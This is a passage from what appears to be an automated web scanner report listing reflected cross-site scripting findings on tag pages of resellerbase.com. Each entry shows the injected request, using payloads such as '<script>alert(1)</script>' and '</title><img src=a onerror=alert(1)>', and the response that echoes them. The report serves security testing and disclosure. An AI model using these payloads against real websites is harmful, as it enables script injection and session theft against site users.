Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: mobile16b1f</title><img src=a onerror=alert(1)>657f07635e57e6b6a</title>
...[SNIP]...

2.4316. http://www.resellerbase.com/tag/mobile [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/mobile

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd1f2<img%20src%3da%20onerror%3dalert(1)>008c72b52e3f18f7c was submitted in the REST URL parameter 2. This input was echoed as fd1f2<img src=a onerror=alert(1)>008c72b52e3f18f7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/mobilefd1f2<img%20src%3da%20onerror%3dalert(1)>008c72b52e3f18f7c?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/mobile
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: mobil
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : mobilefd1f2<img src=a onerror=alert(1)>008c72b52e3f18f7c]</td>
...[SNIP]...

2.4317. http://www.resellerbase.com/tag/mobile [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/mobile

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8126c</title><img%20src%3da%20onerror%3dalert(1)>6c2d1a550d0 was submitted in the REST URL parameter 2. This input was echoed as 8126c</title><img src=a onerror=alert(1)>6c2d1a550d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/mobile8126c</title><img%20src%3da%20onerror%3dalert(1)>6c2d1a550d0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: mobile8126c</title><img src=a onerror=alert(1)>6c2d1a550d0</title>
...[SNIP]...

2.4318. http://www.resellerbase.com/tag/mobile [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/mobile

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec793<img%20src%3da%20onerror%3dalert(1)>98ed404d17e was submitted in the REST URL parameter 2. This input was echoed as ec793<img src=a onerror=alert(1)>98ed404d17e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/mobileec793<img%20src%3da%20onerror%3dalert(1)>98ed404d17e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: mobil
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : mobileec793<img src=a onerror=alert(1)>98ed404d17e]</td>
...[SNIP]...

2.4319. http://www.resellerbase.com/tag/nude [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/nude

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4daa1<script>alert(1)</script>8d0821ad67d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag4daa1<script>alert(1)</script>8d0821ad67d/nude HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4daa1<script>alert(1)</script>8d0821ad67d/nude was not found on this server.</p>
...[SNIP]...

2.4320. http://www.resellerbase.com/tag/outsource [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/outsource

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47d3c<script>alert(1)</script>c6a5f456e50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag47d3c<script>alert(1)</script>c6a5f456e50/outsource HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag47d3c<script>alert(1)</script>c6a5f456e50/outsource was not found on this server.</p>
...[SNIP]...

2.4321. http://www.resellerbase.com/tag/personals [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/personals

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e30b1<script>alert(1)</script>2c04607e71bd443c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tage30b1<script>alert(1)</script>2c04607e71bd443c4/personals?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/personals
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage30b1<script>alert(1)</script>2c04607e71bd443c4/personals?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4322. http://www.resellerbase.com/tag/personals [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/personals

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69dca<script>alert(1)</script>bdb283600e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag69dca<script>alert(1)</script>bdb283600e4/personals HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag69dca<script>alert(1)</script>bdb283600e4/personals was not found on this server.</p>
...[SNIP]...

2.4323. http://www.resellerbase.com/tag/personals [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/personals

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40b81<img%20src%3da%20onerror%3dalert(1)>16782e94da63cd96c was submitted in the REST URL parameter 2. This input was echoed as 40b81<img src=a onerror=alert(1)>16782e94da63cd96c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/personals40b81<img%20src%3da%20onerror%3dalert(1)>16782e94da63cd96c?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/personals
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: perso
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : personals40b81<img src=a onerror=alert(1)>16782e94da63cd96c]</td>
...[SNIP]...

2.4324. http://www.resellerbase.com/tag/personals [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/personals

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a4b5<img%20src%3da%20onerror%3dalert(1)>dbb60554100 was submitted in the REST URL parameter 2. This input was echoed as 5a4b5<img src=a onerror=alert(1)>dbb60554100 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/personals5a4b5<img%20src%3da%20onerror%3dalert(1)>dbb60554100 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: perso
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : personals5a4b5<img src=a onerror=alert(1)>dbb60554100]</td>
...[SNIP]...

2.4325. http://www.resellerbase.com/tag/personals [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/personals

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 706e1</title><img%20src%3da%20onerror%3dalert(1)>164e558f8ef was submitted in the REST URL parameter 2. This input was echoed as 706e1</title><img src=a onerror=alert(1)>164e558f8ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/personals706e1</title><img%20src%3da%20onerror%3dalert(1)>164e558f8ef HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: personals706e1</title><img src=a onerror=alert(1)>164e558f8ef</title>
...[SNIP]...

2.4326. http://www.resellerbase.com/tag/personals [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/personals

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 4507c</title><img%20src%3da%20onerror%3dalert(1)>c199a0f6a9d3763ed was submitted in the REST URL parameter 2. This input was echoed as 4507c</title><img src=a onerror=alert(1)>c199a0f6a9d3763ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/personals4507c</title><img%20src%3da%20onerror%3dalert(1)>c199a0f6a9d3763ed?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/personals
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: personals4507c</title><img src=a onerror=alert(1)>c199a0f6a9d3763ed</title>
...[SNIP]...

2.4327. http://www.resellerbase.com/tag/phone [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/phone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa289<script>alert(1)</script>b6e260c793a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagaa289<script>alert(1)</script>b6e260c793a/phone HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagaa289<script>alert(1)</script>b6e260c793a/phone was not found on this server.</p>
...[SNIP]...

2.4328. http://www.resellerbase.com/tag/phone [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/phone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 46e98<script>alert(1)</script>563538ca1e9b65748 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag46e98<script>alert(1)</script>563538ca1e9b65748/phone?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/phone
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag46e98<script>alert(1)</script>563538ca1e9b65748/phone?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4329. http://www.resellerbase.com/tag/phone [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/phone

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f1c2f</title><img%20src%3da%20onerror%3dalert(1)>bfa4cf4013e was submitted in the REST URL parameter 2. This input was echoed as f1c2f</title><img src=a onerror=alert(1)>bfa4cf4013e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/phonef1c2f</title><img%20src%3da%20onerror%3dalert(1)>bfa4cf4013e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: phonef1c2f</title><img src=a onerror=alert(1)>bfa4cf4013e</title>
...[SNIP]...

2.4330. http://www.resellerbase.com/tag/phone [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/phone

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57b8e<img%20src%3da%20onerror%3dalert(1)>179524b003f was submitted in the REST URL parameter 2. This input was echoed as 57b8e<img src=a onerror=alert(1)>179524b003f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/phone57b8e<img%20src%3da%20onerror%3dalert(1)>179524b003f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: phone
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : phone57b8e<img src=a onerror=alert(1)>179524b003f]</td>
...[SNIP]...

2.4331. http://www.resellerbase.com/tag/phone [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/phone

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d6fb3</title><img%20src%3da%20onerror%3dalert(1)>5ee8267d8e79d15a4 was submitted in the REST URL parameter 2. This input was echoed as d6fb3</title><img src=a onerror=alert(1)>5ee8267d8e79d15a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/phoned6fb3</title><img%20src%3da%20onerror%3dalert(1)>5ee8267d8e79d15a4?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/phone
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: phoned6fb3</title><img src=a onerror=alert(1)>5ee8267d8e79d15a4</title>
...[SNIP]...

2.4332. http://www.resellerbase.com/tag/phone [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/phone

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 56360<img%20src%3da%20onerror%3dalert(1)>38605fd04b85304bc was submitted in the REST URL parameter 2. This input was echoed as 56360<img src=a onerror=alert(1)>38605fd04b85304bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/phone56360<img%20src%3da%20onerror%3dalert(1)>38605fd04b85304bc?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/phone
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: phone
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : phone56360<img src=a onerror=alert(1)>38605fd04b85304bc]</td>
...[SNIP]...

2.4333. http://www.resellerbase.com/tag/private+label [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/private+label

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba124<script>alert(1)</script>79acad5a1355c8164 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

